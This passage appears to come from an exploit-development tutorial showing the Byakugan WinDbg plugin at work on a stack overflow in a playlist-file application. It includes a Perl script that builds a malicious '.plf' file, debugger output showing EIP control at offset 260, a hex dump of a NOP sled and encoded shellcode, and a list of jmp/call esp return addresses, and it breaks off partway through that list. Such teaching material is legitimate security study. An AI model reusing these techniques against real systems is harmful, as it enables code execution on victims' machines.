0:000> !jutsu hunt<\/strong> [J] Controlling eip with myBuffer at offset<\/span> 260. [J] Found buffer myShell @ 0x0012f5c0 [J] Found buffer myShell @ 0x0012f5c0 - Victim of toUpper! [J] Found buffer myShell @ 0x0012f5c0 - Victim of toLower! [J] Found buffer myBuffer @ 0x01f561e4<\/pre>\n0:000> g (d54.970): Break instruction exception - code 80000003 (first chance) eax=00000000 ebx=0012f188 ecx=640246f7 edx=7c9032bc esi=7c9032a8 edi=00000000 eip=0012f5b8 esp=0012f0ac ebp=0012f0c0 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 <Unloaded_ionInfo.dll>+0x12f5b7: 0012f5b8 cc int<\/span> 3<\/pre>\n0:000> !jutsu hunt<\/strong> [J] Found buffer myShell @ 0x0012f5c0 [J] Found buffer myShell @ 0x0012f5c0 - Victim of toUpper! [J] Found buffer myShell @ 0x0012f5c0 - Victim of toLower! [J] Found buffer myBuffer @ 0x01f561e4<\/pre>\n
0:000> d eip+8<\/strong> 0012f5c0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 ................ 0012f5d0 90 90 90 90 90 90 90 90-90 90 90 90 90 90 89 e3 ................ 0012f5e0 db c2 d9 73 f4 59 49 49-49 49 49 43 43 43 43 43 ...s.YIIIIICCCCC 0012f5f0 43 51 5a 56 54 58 33 30-56 58 34 41 50 30 41 33 CQZVTX30VX4AP0A3 0012f600 48 48 30 41 30 30 41 42-41 41 42 54 41 41 51 32 HH0A00ABAABTAAQ2 0012f610 41 42 32 42 42 30 42 42-58 50 38 41 43 4a 4a 49 AB2BB0BBXP8ACJJI 0012f620 4b 4c 4b 58 51 54 43 30-45 50 45 50 4c 4b 47 35 KLKXQTC0EPEPLKG5 0012f630 47 4c 4c 4b 43 4c 43 35-44 38 43 31 4a 4f 4c 4b GLLKCLC5D8C1JOLK<\/pre>\n
Byakugan : findReturn<\/h3>\n
my<\/span> $sploitfile=\"blazesploit.plf<\/span>\"; my<\/span> $junk = \"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8 . . . Ai7<\/span>\"; my<\/span> $junk2 = \"A<\/span>\" x 1000; $payload =$junk.$junk2; open<\/span> ($FILE,\">$sploitfile<\/span>\");a print<\/span> $FILE $payload; close<\/span>($FILE); open<\/span> ($FILE2,\">c:\\\\junk2.txt<\/span>\"); print<\/span> $FILE2 $junk2; close<\/span>($FILE2);<\/pre>\n(c34.7f4): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000001 ebx=77f6c19c ecx=05a8dcd8 edx=00000042 esi=01f61c20 edi=6405569c eip=37694136 esp=0012f470 ebp=01f61e60 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 <Unloaded_ionInfo.dll>+0x37694135: 37694136 ?? ???<\/pre>\n
\n
0:000> !load byakugan [Byakugan] Successfully loaded! 0:000> !jutsu identBuf msfpattern myJunk1 264 [J] Creating buffer myJunk1. 0:000> !jutsu identBuf file myJunk2 c:\\junk2.txt [J] Creating buffer myJunk2. 0:000> !jutsu listBuf [J] Currently tracked buffer patterns: Buf: myJunk1 Pattern: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0A... (etc) Buf: myJunk2 Pattern: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (etc) 0:000> !jutsu hunt [J] Controlling eip with myJunk1 at offset<\/span> 260. [J] Found buffer myJunk1 @ 0x0012f254 [J] Found buffer myJunk2 @ 0x0012f460 [J] Found buffer myJunk2 @ 0x0012f460 - Victim of toUpper! 0:000> !jutsu findReturn [J] started return<\/span> address hunt [J] valid return<\/span> address (jmp esp) found at 0x3d9572cc [J] valid return<\/span> address (call esp) found at 0x3d9bb043 [J] valid return<\/span> address (jmp esp) found at 0x3d9bd376 [J] valid return<\/span> address (call esp) found at 0x4b2972cb [J] valid return<\/span> address (jmp esp) found at 0x4b297591 [J] valid return<\/span> address (call esp) found at 0x4b297ccb [J] valid return<\/span> address (jmp esp) found at 0x4b297f91 [J] valid return<\/span> address (call esp) found at 0x4ec5c26d [J] valid return<\/span> address (jmp esp) found at 0x4ec88543 [J] valid return<\/span> address (call esp) found at 0x4ece5a73 [J] valid return<\/span> address (jmp esp) found at 0x4ece7267 [J] valid return<\/span> address (call esp) found at 0x4ece728f [J] valid return<\/span> address (jmp esp) found at 0x4f1c5055 [J] valid return<\/span> address (call esp) found at 0x4f1c50eb [J] valid return<\/span> address (jmp esp) found at 0x4f1c53b1 [J] valid return<\/span> address (call esp) found at 0x4f1c5aeb [J] valid return<\/span> address (jmp esp) found at 0x4f1c5db1 [J] valid return<\/span> address (jmp esp) found at 0x74751873 [J] valid return<\/span> address (call esp) found at 0x7475d20f [J] valid return<\/span> address (jmp esp) found at 0x748493ab [J] valid return<\/span> address (call esp) found at 0x748820df [J] valid return<\/span> address (jmp esp) found at 0x748d5223 [J] valid return<\/span> address (call esp) found at 0x755042a9 [J] valid return<\/span> address (jmp esp) found at 0x75fb5700 [J] valid return<\/span> address (jmp esp) found at 0x76b43adc [J] valid return<\/span> address (call esp) found at 0x77132372 [J] valid return<\/span> address (jmp esp) found at 0x77156342 [J] valid return<\/span> address (call esp) found at 0x77506cca [J] valid